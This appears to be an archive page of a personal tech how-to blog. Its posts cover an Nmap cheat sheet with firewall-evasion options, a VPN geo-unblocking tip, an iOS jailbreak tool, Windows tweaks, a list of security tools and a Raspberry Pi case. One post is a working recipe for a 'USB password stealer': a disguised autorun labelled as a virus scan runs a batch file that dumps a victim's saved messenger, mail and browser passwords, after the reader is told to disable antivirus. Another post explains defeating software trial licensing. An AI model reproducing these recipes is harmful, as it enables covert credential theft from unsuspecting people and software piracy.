Archive for the ‘How to….’ Category



The de-facto standard in network scanning for many years has been Nmap. Nmap is universally supported by Linux and Windows alike and is free to download > Download Nmap

The only thing I have found is that there are so many commands it makes it difficult to remember what to enter, so here is a quick guide for fast scanning, Also I have created it in a PDF for easy reference > Nmap Cheat

Basic Scanning Techniques

Scan a single target —> nmap [target]

Scan multiple targets —> nmap [target1,target2,etc]

Scan a list of targets —-> nmap -iL [list.txt]

Scan a range of hosts —-> nmap [range of IP addresses]

Scan an entire subnet —-> nmap [IP address/cdir]

Scan random hosts —-> nmap -iR [number]

Excluding targets from a scan —> nmap [targets] –exclude [targets]

Excluding targets using a list —> nmap [targets] –excludefile [list.txt]

Perform an aggressive scan —> nmap -A [target]

Scan an IPv6 target —> nmap -6 [target]

Discovery Options

Perform a ping scan only —> nmap -sP [target]

Don’t ping —> nmap -PN [target]

TCP SYN Ping —> nmap -PS [target]

TCP ACK ping —-> nmap -PA [target]

UDP ping —-> nmap -PU [target]

SCTP Init Ping —> nmap -PY [target]

ICMP echo ping —-> nmap -PE [target]

ICMP Timestamp ping —> nmap -PP [target]

ICMP address mask ping —> nmap -PM [target]

IP protocol ping —-> nmap -PO [target]

ARP ping —> nmap -PR [target]

Traceroute —> nmap –traceroute [target]

Force reverse DNS resolution —> nmap -R [target]

Disable reverse DNS resolution —> nmap -n [target]

Alternative DNS lookup —> nmap –system-dns [target]

Manually specify DNS servers —> nmap –dns-servers [servers] [target]

Create a host list —-> nmap -sL [targets]

Advanced Scanning Options

TCP SYN Scan —> nmap -sS [target]

TCP connect scan —-> nmap -sT [target]

UDP scan —-> nmap -sU [target]

TCP Null scan —-> nmap -sN [target]

TCP Fin scan —> nmap -sF [target]

Xmas scan —-> nmap -sX [target]

TCP ACK scan —> nmap -sA [target]

Custom TCP scan —-> nmap –scanflags [flags] [target]

IP protocol scan —-> nmap -sO [target]

Send Raw Ethernet packets —-> nmap –send-eth [target]

Send IP packets —-> nmap –send-ip [target]

Port Scanning Options

Perform a fast scan —> nmap -F [target]

Scan specific ports —-> nmap -p [ports] [target]

Scan ports by name —-> nmap -p [port name] [target]

Scan ports by protocol —-> nmap -sU -sT -p U:[ports],T:[ports] [target]

Scan all ports —-> nmap -p “*” [target]

Scan top ports —–> nmap –top-ports [number] [target]

Perform a sequential port scan —-> nmap -r [target]

Version Detection

Operating system detection —-> nmap -O [target]

Submit TCP/IP Fingerprints —->

Attempt to guess an unknown —-> nmap -O –osscan-guess [target]

Service version detection —-> nmap -sV [target]

Troubleshooting version scans —-> nmap -sV –version-trace [target]

Perform a RPC scan —-> nmap -sR [target]

Timing Options

Timing Templates —-> nmap -T [0-5] [target]

Set the packet TTL —-> nmap –ttl [time] [target]

Minimum of parallel connections —-> nmap –min-parallelism [number] [target]

Maximum of parallel connection —-> nmap –max-parallelism [number] [target]

Minimum host group size —–> nmap –min-hostgroup [number] [targets]

Maximum host group size —-> nmap –max-hostgroup [number] [targets]

Maximum RTT timeout —–> nmap –initial-rtt-timeout [time] [target]

Initial RTT timeout —-> nmap –max-rtt-timeout [TTL] [target]

Maximum retries —-> nmap –max-retries [number] [target]

Host timeout —-> nmap –host-timeout [time] [target]

Minimum Scan delay —-> nmap –scan-delay [time] [target]

Maximum scan delay —-> nmap –max-scan-delay [time] [target]

Minimum packet rate —-> nmap –min-rate [number] [target]

Maximum packet rate —-> nmap –max-rate [number] [target]

Defeat reset rate limits —-> nmap –defeat-rst-ratelimit [target]

Firewall Evasion Techniques

Fragment packets —-> nmap -f [target]

Specify a specific MTU —-> nmap –mtu [MTU] [target]

Use a decoy —-> nmap -D RND: [number] [target]

Idle zombie scan —> nmap -sI [zombie] [target]

Manually specify a source port —-> nmap –source-port [port] [target]

Append random data —-> nmap –data-length [size] [target]

Randomize target scan order —-> nmap –randomize-hosts [target]

Spoof MAC Address —-> nmap –spoof-mac [MAC|0|vendor] [target]

Send bad checksums —-> nmap –badsum [target]

Output Options

Save output to a text file —-> nmap -oN [scan.txt] [target]

Save output to a xml file —> nmap -oX [scan.xml] [target]

Grepable output —-> nmap -oG [scan.txt] [target]

Output all supported file types —-> nmap -oA [path/filename] [target]

Periodically display statistics —-> nmap –stats-every [time] [target]

133t output —-> nmap -oS [scan.txt] [target]

Troubleshooting and debugging

Help —> nmap -h

Display Nmap version —-> nmap -V

Verbose output —-> nmap -v [target]

Debugging —-> nmap -d [target]

Display port state reason —-> nmap –reason [target]

Only display open ports —-> nmap –open [target]

Trace packets —> nmap –packet-trace [target]

Display host networking —> nmap –iflist

Specify a network interface —> nmap -e [interface] [target]

Nmap Scripting Engine

Execute individual scripts —> nmap –script [script.nse] [target]

Execute multiple scripts —-> nmap –script [expression] [target]

Script categories —-> all, auth, default, discovery, external, intrusive, malware, safe, vuln

Execute scripts by category —-> nmap –script [category] [target]

Execute multiple scripts categories —-> nmap –script [category1,category2, etc]

Troubleshoot scripts —-> nmap –script [script] –script-trace [target]

Update the script database —-> nmap –script-updatedb


Comparison using Ndiff —-> ndiff [scan1.xml] [scan2.xml]

Ndiff verbose mode —-> ndiff -v [scan1.xml] [scan2.xml]

XML output mode —-> ndiff –xml [scan1.xm] [scan2.xml]

For more excellent FREE security training visit >




How to watch BBC iPlayer from countries other than the UK

Although this tutorial seems easy to do (and it is) it is a little know upgrade to a product that I have used for years. As I reside in the UK I can freely view BBC iPlayer for free, however to view the contents on pages like (which you have to be in the US to view) and bypass my ISPs ban on I use an application called Hotspot Shield. Just follow the next few set steps to get full and away you go.

Go to and download the free version

After the install you will see a little red shield. Double click the shield and you will see a popup window as below, just click the country you would like your IP to become and off you go you can now watch all the goodies that are not broadcast in your own country

hotspot sheild

tv crime2

It has been a long time since the news for an all-round jailbreak tool started to float around the community. Yes, you can now jailbreak your iDevice running iOS 6.1.

This jailbreak tool supports almost all iGadgets and allows an untethered jailbreak for any device that you can think of except for Apple TV 3.

The incredible and the most talented jailbreak gurus joined hands not too long ago to bring the most reliable jailbreak ever. The gurus namely Pimskeks, Planetbeing, Pod2g and MuscleNerd formed a team and called themselves the Evad3rs specifically for this project. The idea was to exploit Apple’s post-A5 chip devices in order to develop the jailbreak for iOS 6. It seems like they were very successful in doing so and have accomplished their goal with flying colours. The Evad3rs being to you Evasi0n to rock your iDevice and Apple Co.’s world!

The following devices are supported by this tool:

  • iPhone 5
  • iPhone 4S
  • iPhone 4evasi0n-iOS-66.1
  • iPhone 3GS
  • iPad 4
  • iPad 3
  • iPad 2
  • iPad mini
  • iPod touch 4
  • iPod touch 5

iOS firmware versions supported by Evasi0n:

  • iOS 6.0
  • iOS 6.0.1
  • iOS 6.0.2
  • iOS 6.1

We recommend our readers not to update their devices over the air and to instead use download links provided below or through iTunes. You can now enjoy iOS 6′s features with the added perks of jailbreak tweaks.

Download iOS 6.1 for your iDevice.
Download Evasi0n for Windows.
Download Evasi0n for Mac.
Download Evasi0n for Linux

christmas TV

So essentially what we are going to do is create a shortcut to the Apps screen, you’ll use the Shell command. In order to launch a Shell command from a shortcut, you need to use the explorer.exe command. As such, the shortcut to launch the Apps screen consists of the following command line. (Take note that there are three colons between the word shell and the left brace. Also keep in mind that there is only one space in the whole command line between the .exe file extension and the word shell.)


explorer.exe shell:::{2559a1f8-21d7-11d4-bdaf-00c04f60b9f0}

To create the shortcut, just open the Documents folder, right-click on the background, and choose the New | Shortcut command. When you see the first screen in the Create Shortcut wizard, type the shortcut in the text box, as shown in Pic 1. Then, click Next.


As you type the shortcut, beware of typos

When you see the second screen in the Create Shortcut wizard, type a short name for your shortcut. As you can see in Pic 2, I named my example shortcut Apps. To complete the wizard, just click Finish.


One this is done you will see a shortcut appear just right click on it and select the Properties command, as shown in Pic 3


When you see the Properties dialog box, click the Change Icon button to open the Change Icon dialog box, as shown in Pic 4.

By default the Change Icon dialog box displays the icons from the explorer.exe file. As you can see, none of the available icons are very exciting. However, if you click the Browse button, you can search for other files that contain icons.


By default, the Change Icon dialog box displays the icons from the explorer.exe.

I first found a nice Windows flag in the imageres.dll file (C:\Windows\System32.dll) that I considered using, but then I remembered the green Orb icon from Windows Media Center was very nice and found it in the ehshell.exe file (C:\Windows\ehome). Both are shown in pic 5


While the Windows flag icon is a good choice, I like the Windows Media Center icon better.

I ended up choosing the Windows Media Center icon because it resembles the Start button but since it is green, it is different from the blue Windows 7 icon. Of course, you can use any icon that you prefer. As soon as you choose your icon, right click on it and then select the Pin to Taskbar command, as shown in pic 6


Select the Pin to Taskbar command.

Once your custom Start button appears on the taskbar, drag it all the way to the left side of the taskbar, as shown in pic 7.  You can use the green Orb icon and positioning it at the end of the taskbar it really makes the desktop look like Windows 7, however I personally prefer the simple Windows flag icon.


Drag the pinned icon to the left side of the taskbar.

Now when you click your custom Start button, the Apps screen will appear, as shown in pic 8. You can then click once to dismiss the Search panel, and then select the icon of the application that you want to launch.


I will be posting more how to’s for Windows 8 in  the coming moths so stay tuned.

This post is of-course for educational purposes only.

Although the title of this post implies that this is designed for a USB, any device like an MP3 player or a mobile phone can be used as they can all execute programs.

We know that windows stores most of its passwords on daily basis , such as MSN messenger passwords,Yahoo passwords,Facebook passwords etc. Most people hate to type passwords over and over again; so when that little tick box appears that asks to save/remember password the opportunity is jumped at, this shall be their undoing.


Things you will need?
Note: Before downloading the following apps you might want to disable your Anti Virus, as most of these will appear as a suspicious file.

MessenPass - MessenPass is a password recovery tool that reveals the passwords of the following instant messenger applications:

  • MSN Messenger
  • Windows Messenger (In Windows XP)
  • Windows Live Messenger (In Windows XP/Vista/7)
  • Yahoo Messenger (Versions 5.x and 6.x)
  • Google Talk
  • ICQ Lite 4.x/5.x/2003
  • AOL Instant Messenger v4.6 or below, AIM 6.x, and AIM Pro.
  • Trillian
  • Trillian Astra
  • Miranda
  • GAIM/Pidgin
  • MySpace IM
  • PaltalkScene
  • Digsby

Mail PassView - Mail PassView is a small password-recovery tool that reveals the passwords and other account details for:

  • Outlook Express
  • Microsoft Outlook 2000 (POP3 and SMTP Accounts only)
  • Microsoft Outlook 2002/2003/2007/2010 (POP3, IMAP, HTTP and SMTP Accounts)
  • Windows Mail
  • Windows Live Mail
  • IncrediMail
  • Eudora
  • Netscape 6.x/7.x (If the password is not encrypted with master password)
  • Mozilla Thunderbird (If the password is not encrypted with master password)
  • Group Mail Free
  • Yahoo! Mail – If the password is saved in Yahoo! Messenger application.
  • Hotmail/MSN mail – If the password is saved in MSN/Windows/Live Messenger application.
  • Gmail – If the password is saved by Gmail Notifier application, Google Desktop, or by Google Talk.

IE Passview - IE passview is a small program that helps us view stored passwords in Internet Explorer.

Protected storage pass viewer(PSPV) -  Protected Storage PassView is a small utility that reveals the passwords stored on your computer by Internet Explorer, Outlook Express and MSN Explorer.

Password Fox - Password fox is a small program used to view Stored passwords in Mozilla Firefox

Now here is a step by step tutorial to create a USB password stealer to steal saved passwords:

1.First of all download all 5 tools and copy the executable files in your USB  i.e. Copy the files  mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.
2. Create a new Notepad and write the following text into it.



ACTION= Perform a Virus Scan

save the Notepad and rename it from

New Text Document.txt to autorun.inf

Now copy the autorun.inf file onto your USB


3. Create another Notepad and write the following text onto it.

start mspass.exe /stext mspass.txt

start mailpv.exe /stext mailpv.txt

start iepv.exe /stext iepv.txt

start pspv.exe /stext pspv.txt

start passwordfox.exe /stext passwordfox.txt
Save the Notepad file and rename it from New Text Document.txt to launch.bat

Copy the launch.bat file also to your USB drive.
Now your USB Password stealer is ready, all you have to do is insert it in your victims computer and  a popup will appear, in the popup window select the option (Launch virus scan) as soon as you will click it the following window will appear.

After this you can see saved password in .TXT files on the USB
Have fun and hack responsibly

In this post, I will show you how to hack Software and run the trial program forever. Most of us are familiar with many software programs that run only for a specified period of time in the trial mode. Once the trial period is expired, these programs stop functioning and demand for a purchase.

However, there is a way to run the software programs so that they function beyond the trial period. Isn’t this interesting?

Well, before I tell you how to hack the software and make it run in the trial mode forever, we will have to first understand how the licensing scheme of these programs work. I’ll try to explain this in brief.

When the software programs are installed for the first time, they make an entry into the Windows Registry with the details such as installed Date and Time, installed path etc. After the installation, every time you run the program, it compares the current system date and time with the installed date and time. With this, it can make out whether the trial period is expired or not.

So, with this being the case, just manually changing the system date to an earlier date will not solve the problem. For this purpose there is a small tool known as RunAsDate.

RunAsDate is a small utility that allows you to run a program in the date and time that you specify. This utility doesn’t change the current system date, but it only injects the date/time that you specify into the desired application.

RunAsDate intercepts the kernel API calls that returns the current date and time (GetSystemTime, GetLocalTime, GetSystemTimeAsFileTime), and replaces the current date/time with the date/time that you specify. It works with Windows 2000, XP, 2003, Vista and 7.

You can download RunAsDate from the following link:

Download RunAsDate


You will have to follow these tips carefully to successfully hack a software and make it run in it’s trial mode forever:

  1. Note down the date and time, when you install the software for the first time.
  2. Once the trial period expires, you must always run the software using RunAsDate.
  3. After the trial period is expired, do not run the software (program) directly. If you run the software directly even once, this hack may no longer work.
  4. It is better and safe to inject the date of the last day in the trial period.

For example, if the trial period expires on Jan 30 2012, always inject the date as Jan 29 2012 in the RunAsDate. I hope this helps! Please express your experience and opinions through comments.

1. Nmap

Nmap (“Network Mapper”) is a free and open source (license) utility for network discovery and security auditing. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. Nmap homepage.

2. Wireshark

Wireshark is a network protocol analyzer. It lets you capture and interactively browse the traffic running on a computer network. Wireshark homepage.

3. Metasploit Community edition

Metasploit Community Edition simplifies network discovery and vulnerability verification for specific exploits, increasing the effectiveness of vulnerability scanners. This helps prioritize remediation and eliminate false positives, providing true security risk intelligence. Metasploit community edition homepage.

4. Nikto2

Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6400 potentially dangerous files/CGIs, checks for outdated versions of over 1200 servers, and version specific problems on over 270 servers. It also checks for server configuration items such as the presence of multiple index files, HTTP server options, and will attempt to identify installed web servers and software. Nikto2 homepage.

5. John the Ripper

John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. Besides several crypt(3) password hash types most commonly found on various Unix systems, supported out of the box are Windows LM hashes, plus lots of other hashes and ciphers in the community-enhanced version. John the Ripper homepage.

6. ettercap

Ettercap is a comprehensive suite for man in the middle attacks. It features sniffing of live connections, content filtering on the fly and many other interesting tricks. It supports active and passive dissection of many protocols and includes many features for network and host analysis. ettercap homepage.

7. NexPose Community edition

The Nexpose Community Edition is a free, single-user vulnerability management solution. Nexpose Community Edition is powered by the same scan engine as Nexpose Enterprise and offers many of the same features. Nexpose homepage.

8. Ncat

Ncat is a feature-packed networking utility which reads and writes data across networks from the command line. Ncat was written for the Nmap Project as a much-improved reimplementation of the venerable Netcat. It uses both TCP and UDP for communication and is designed to be a reliable back-end tool to instantly provide network connectivity to other applications and users. Ncat will not only work with IPv4 and IPv6 but provides the user with a virtually limitless number of potential uses. ncat homepage.

9. Kismet

Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. Kismet will work with any wireless card which supports raw monitoring (rfmon) mode, and (with appropriate hardware) can sniff 802.11b, 802.11a, 802.11g, and 802.11n traffic. Kismet also supports plugins which allow sniffing other media such as DECT. kismet homepage.

10. w3af

w3af is a Web Application Attack and Audit Framework. The project’s goal is to create a framework to find and exploit web application vulnerabilities that is easy to use and extend. w3af homepage.

11. hping

hping is a command-line oriented TCP/IP packet assembler/analyzer. The interface is inspired to the ping(8) unix command, but hping isn’t only able to send ICMP echo requests. It supports TCP, UDP, ICMP and RAW-IP protocols, has a traceroute mode, the ability to send files between a covered channel, and many other features. hping homepage.

12. burpsuite

Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application’s attack surface, through to finding and exploiting security vulnerabilities. BurpSuite homepage.

13. THC-Hydra

A very fast network logon cracker which support many different services.  hydra homepage.

14. sqlmap

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections. sqlmap homepage.

15. webscarab

WebScarab has a large amount of functionality, and as such can be quite intimidating to the new user. But, for the simplest case, intercepting and modifying requests and responses between a browser and HTTP/S server, there is not a lot that needs to be learned. WebScarab homepage.


Every day I hear the words “My machine is running slow, can you help” (not always that polite). But never the less the answer is always ‘Yes’.

People understand that running disk clean up and defragging their machine will help keep their machine up to speed. But one thing that users are a bit apprehensive about  (and quite rightly so) is turning off Windows services in the fear that they will break something, so here is a list of safe services to turn off and how to do it.

Disable unnecessary Windows services to free up CPU and RAM usage, speed up boot and start up time. This procedure is very easy, just follow my steps correctly.

Click start, run, and type “services.msc”. And the services window will show up.

Now you are on the services page, just double click the service you want to disable and this window will show up. (Don’t worry keep reading there is a list of services soon)

Now here is the list of Windows services that are safe to disable.

  • Application Experience
  • Block Level Backup Engine Service
  • Certificate Propagation
  • IP Helper
  • Portable Device Enumerator Service
  • Distributed Link Tracking Client
  • Protected Storage
  • Portable Device Enumerator Service
  • Secondary Logon
  • Software Protection
  • Server
  • Tablet PC Input Service
  • TCP/IP NetBIOS Helper
  • Windows Media Center Service Launcher
  • Windows Search
  • Remote Registry
  • Windows Time

Windows services that are safe to disable if…

  • Desktop Windows Manager Session Manager (if you are on a Netbook)
  • Diagnostic Policy Service (if you don’t use the troubleshooter)
  • Error Reporting Service
  • HomeGroup Listener (No Homegroup sharing)
  • HomeGroup Provider (No HomeGroup sharing)
  • Offline files
  • Print Spooler (if you don have a printer)
  • SSDP Discovery (No HomeGroup sharing)
  • Themes ( if you are on a Netbook)
  • Windows Defender (If you have an Antivirus installed)
  • Windows Firewall (Firewall installed)
  • Windows Image Acquisition (if you don’t have any imaging devices ie., camera, scanners)
  • Windows Media Player Network Sharing Services (No Homegroup sharing)

Disabling unwanted Windows services will eventually speed up your PC, prevent application crashes, frees up RAM and lowers CPU congestion.

While you are doing this if you see services you are not sure of just drop a request in the comments bellow and I’ll tell you if it is safe to disable.


Firefox is the latest version of Mozilla’s popular Internet browser. People using it typically update the software to get its new features. Unfortunately, this version brought us an unpleasant crash issue connected with Flash Player. More accurately, when you update Firefox 13 with Flash 11.3 on your Windows 7 computer, you may encounter the Flash 11.3 Protected Mode problem. In the instructions below you can read about how to fix this issue and prevent unpleasant Flash Player crashes.


Fixing Flash 11.3 Protected Mode Issue in Firefox 13 Instructions:

  1. Open “Computer / My Computer” and go to Flash folder:
    For Windows 32bit Users: C:\windows\system32\macromed\flash
    For Windows 64bit Users: C:\windows\syswow64\macromed\flash
  2. Find and open the “mms.cfg” file in a text editor.
    Note: If there is no mms.cfg file, you will need to create one.
  3. Add the following command to the file:
    ProtectedMode = 0
  4. Save the “mms.cfg” file and close it.

So last week I finally got a Raspberry Pi motherboard and I have to say I am very impressed. I have a distro of Debian running at the moment called Raspbian “wheezy” which runs like a dream.

The only thing I was worried about is that the board comes with no case, this is of course to keep the price at £25 which is amazing in its self. So to give the board a little protection I thought I’d buy/make a case for it, and by the title of this post you can guess I found one and it is FREE \o/

The Punnet – a card case for you to print (for free)

It’s any easy to create card case, its just up to you what card you use. Here is a link to a guy that printed his own case.

Here is an alternative case to print> Case.pdf

Here is a Visio version of the case so you can customise it to your hearts content> Caintech Visio Case

Send me in some of you pictures and I’ll post the best one